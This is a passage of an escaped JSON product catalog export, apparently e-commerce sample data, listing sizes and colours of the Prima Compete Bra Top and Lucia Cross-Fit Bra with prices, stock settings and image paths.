,\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb04-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb04-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Yellow\"},\"1605\":{\"sku\":\"WB04\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Prima Compete Bra Top\",\"description\":\"<p>Pull on the Prima Compete Bra Top and you\'ll love the fabric: soft, stretchy, and ultra lightweight. But you\'ll also love the racerback cut, for freer movement through all your athletic feats. <br \\/>`<br \\/>&bull; Colorblocked details.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Bra,material=EverCool&trade;|Organic Cotton|Spandex,pattern=Solid,climate=Indoor|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WB04-XS-Blue,size=XS,color=Blue|sku=WB04-XS-Purple,size=XS,color=Purple|sku=WB04-XS-Yellow,size=XS,color=Yellow|sku=WB04-S-Blue,size=S,color=Blue|sku=WB04-S-Purple,size=S,color=Purple|sku=WB04-S-Yellow,size=S,color=Yellow|sku=WB04-M-Blue,size=M,color=Blue|sku=WB04-M-Purple,size=M,color=Purple|sku=WB04-M-Yellow,size=M,color=Yellow|sku=WB04-L-Blue,size=L,color=Blue|sku=WB04-L-Purple,size=L,color=Purple|sku=WB04-L-Yellow,size=L,color=Yellow|sku=WB04-XL-Blue,size=XL,color=Blue|sku=WB04-XL-Purple,size=XL,color=Purple|sku=WB04-XL-Yellow,size=XL,color=Yellow\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb04-blue-0.jpg,\\/w\\/b\\/wb04-blue_alt1.jpg,\\/w\\/b\\/wb04-blue_back.jpg\",\"image\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb04-blue-0.jpg,\\/w\\/b\\/wb04-blue_alt1.jpg,\\/w\\/b\\/wb04-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Bra\",\"material\":\"EverCool&trade;|Organic Cotton|Spandex\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1606\":{\"sku\":\"WB05-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Lucia Cross-Fit Bra -XS-Black\",\"description\":\"<p>Being cool is a big part of being comfy, which is why the Lucia Cross-Fit Bra features moisture-wicking technology as well as soft, lightweight fabric.<\\/p>\\n<p>&bull; Black\\/white bra top. <br \\/>&bull; Criss-cross back design. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lucia-cross-fit-bra-xs-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb05-black_back.jpg\",\"image\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb05-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Black\"},\"1607\":{\"sku\":\"WB05-XS-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Lucia Cross-Fit Bra -XS-Orange\",\"description\":\"<p>Being cool is a big part of being comfy, which is why the Lucia Cross-Fit Bra features moisture-wicking technology as well as soft, lightweight fabric.<\\/p>\\n<p>&bull; Black\\/white bra top. <br \\/>&bull; Criss-cross back design. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lucia-cross-fit-bra-xs-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb05-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb05-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb05-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb05-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb05-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Orange\"},\"1608\":{\"sku\":\"WB05-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Lucia Cross-Fit Bra -XS-Purple\",\"description\":\"<p>Being cool is a big part of being comfy, which is why the Lucia Cross-Fit Bra features moisture-wicking technology as well as soft, lightweight fabric.<\\/p>\\n<p>&bull; Black\\/white bra top. <br \\/>&bull; Criss-cross back design. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lucia-cross-fit-bra-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb05-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb05-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb05-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb05-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb05-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"},\"1609\":{\"sku\":\"WB05-S-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Lucia Cross-Fit Bra -S-Black\",\"description\":\"<p>Being cool is a big part of being comfy, which is why the Lucia Cross-Fit Bra features moisture-wicking technology as well as soft, lightweight fabric.<\\/p>\\n<p>&bull; Black\\/white bra top. <br \\/>&bull; Criss-cross back design. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lucia-cross-fit-bra-s-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb05-black_back.jpg\",\"image\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb05-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Black\"},\"1610\":{\"sku\":\"WB05-S-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Lucia Cross-Fit Bra -S-Orange\",\"description\":\"<p>Being cool is a big part of being comfy, which is why the Lucia Cross-Fit Bra features moisture-wicking technology as well as soft, lightweight fabric.<\\/p>\\n<p>&bull; Black\\/white bra top. <br \\/>&bull; Criss-cross back design. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lucia-cross-fit-bra-s-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb05-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb05-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb05-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb05-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb05-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Orange\"},\"1611\":{\"sku\":\"WB05-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Lucia Cross-Fit Bra -S-Purple\",\"description\":\"<p>Being cool is a big part of being comfy, which is why the Lucia Cross-Fit Bra features moisture-wicking technology as well as soft, lightweight fabric.<\\/p>\\n<p>&bull; Black\\/white bra top. <br \\/>&bull; Criss-cross back design. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lucia-cross-fit-bra-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb05-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb05-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb05-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb05-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb05-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"},\"1612\":{\"sku\":\"WB05-M-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Lucia Cross-Fit Bra -M-Black\",\"description\":\"<p>Being cool is a big part of being comfy, which is why the Lucia Cross-Fit Bra features moisture-wicking technology as well as soft, lightweight fabric.<\\/p>\\n<p>&bull; Black\\/white bra top. <br \\/>&bull; Criss-cross back design. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lucia-cross-fit-bra-m-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb05-black_back.jpg\",\"image\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb05-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb05-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},\"1613\":{\"sku\":\"WB05-M-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Lucia Cross-Fit Bra -M-Orange\",\"description\":\"<p>Being cool is a big part of being comfy, which is why the Lucia Cross-Fit Bra features moisture-wicking technology as well as soft, lightweight fabric.<\\/p>\\n<p>&bull; Black\\/white bra top. <br \\/>&bull; Criss-cross back design. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 